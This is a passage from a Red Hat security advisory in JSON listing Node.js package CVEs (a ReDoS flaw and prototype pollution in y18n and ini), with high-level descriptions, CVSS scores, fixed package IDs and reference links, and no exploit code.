"7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.src", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-docs-0:14.15.4-2.el7.noarch", "7Server-RHSCL-3.6:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.src", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-docs-0:14.15.4-2.el7.noarch", "7Workstation-RHSCL-3.6:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.x86_64" ] } ], "threats": [ { "category": "impact", "details": "Low" } ], "title": "nodejs-npm-user-validate: improper input validation when validating user emails leads to ReDoS" }, { "cve": "CVE-2020-7774", "cwe": { "id": "CWE-915", "name": "Improperly Controlled Modification of Dynamically-Determined Object Attributes" }, "discovery_date": "2020-11-17T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "1898680" } ], "notes": [ { "category": "description", "text": "A flaw was found in nodejs-y18n. There is a prototype pollution vulnerability in y18n\u0027s locale functionality. If an attacker is able to provide untrusted input via locale, they may be able to cause denial of service or in rare circumstances, impact to data integrity or confidentiality.", "title": "Vulnerability description" }, { "category": "summary", "text": "nodejs-y18n: prototype pollution vulnerability", "title": "Vulnerability summary" }, { "category": "other", "text": "In OpenShift Container Platform (OCP), OpenShift ServiceMesh (OSSM) and OpenShift distributed tracing the affected components are behind OpenShift OAuth authentication. This restricts access to the vulnerable nodejs-y18n library to authenticated users only, therefore the impact is Low.\n\nIn Red Hat OpenShift Container Storage 4 the noobaa-core container includes the affected version of y18n as a dependency of yargs. However, no unsafe usage found where the module accepts untrusted input and hence this issue has been rated as having a security impact of Low.", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.src", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-docs-0:14.15.4-2.el7.noarch", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.src", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-docs-0:14.15.4-2.el7.noarch", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.src", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-docs-0:14.15.4-2.el7.noarch", "7Server-RHSCL-3.6:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.src", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-docs-0:14.15.4-2.el7.noarch", "7Workstation-RHSCL-3.6:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.x86_64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2020-7774" }, { "category": "external", "summary": "RHBZ#1898680", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1898680" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2020-7774", "url": "https://www.cve.org/CVERecord?id=CVE-2020-7774" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2020-7774", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-7774" }, { "category": "external", "summary": "https://snyk.io/vuln/SNYK-JS-Y18N-1021887", "url": "https://snyk.io/vuln/SNYK-JS-Y18N-1021887" } ], "release_date": "2020-10-25T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-02-04T17:20:51+00:00", "details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": [ "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.src", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-docs-0:14.15.4-2.el7.noarch", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.src", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-docs-0:14.15.4-2.el7.noarch", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.src", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-docs-0:14.15.4-2.el7.noarch", "7Server-RHSCL-3.6:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.src", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-docs-0:14.15.4-2.el7.noarch", "7Workstation-RHSCL-3.6:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.x86_64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:0421" } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 7.3, "baseSeverity": "HIGH", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "products": [ "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.src", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-docs-0:14.15.4-2.el7.noarch", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.src", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-docs-0:14.15.4-2.el7.noarch", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.src", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-docs-0:14.15.4-2.el7.noarch", "7Server-RHSCL-3.6:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.src", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-docs-0:14.15.4-2.el7.noarch", "7Workstation-RHSCL-3.6:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.x86_64" ] } ], "threats": [ { "category": "impact", "details": "Moderate" } ], "title": "nodejs-y18n: prototype pollution vulnerability" }, { "cve": "CVE-2020-7788", "cwe": { "id": "CWE-400", "name": "Uncontrolled Resource Consumption" }, "discovery_date": "2020-12-11T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "1907444" } ], "notes": [ { "category": "description", "text": "A flaw was found in nodejs-ini. If an attacker submits a malicious INI file to an application that parses it with ini.parse, they will pollute the prototype on the application. This can be exploited further depending on the context.", "title": "Vulnerability description" }, { "category": "summary", "text": "nodejs-ini: Prototype pollution via malicious INI file", "title": "Vulnerability summary" }, { "category": "other", "text": "Node.JS packages in Red Hat Enterprise Linux and Red Hat Software Collections included the vulnerable dependency packaged in \"nodejs-npm\" component. Processing malicious files using npm could potentially trigger this vulnerability. The \"ini\" package bundled with npm was not in the library path where it could be included directly in other programs.\n\nThe nodejs-nodemon packages in Red Hat Enterprise Linux and Red Hat Software Collections are affected by this vulnerability as they bundle the nodejs-ini library. Usage of that library is governed by nodemon itself, so applications started by nodemon are not impacted. Further, nodemon is a developer tool not intended to be used in production.\n\nThe ini package is included in Red Hat Quay by protractor and webpack-cli, both of which are dev dependencies.", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.src", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-docs-0:14.15.4-2.el7.noarch", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.src", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-docs-0:14.15.4-2.el7.noarch", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.src", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-docs-0:14.15.4-2.el7.noarch", "7Server-RHSCL-3.6:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.x86_64", 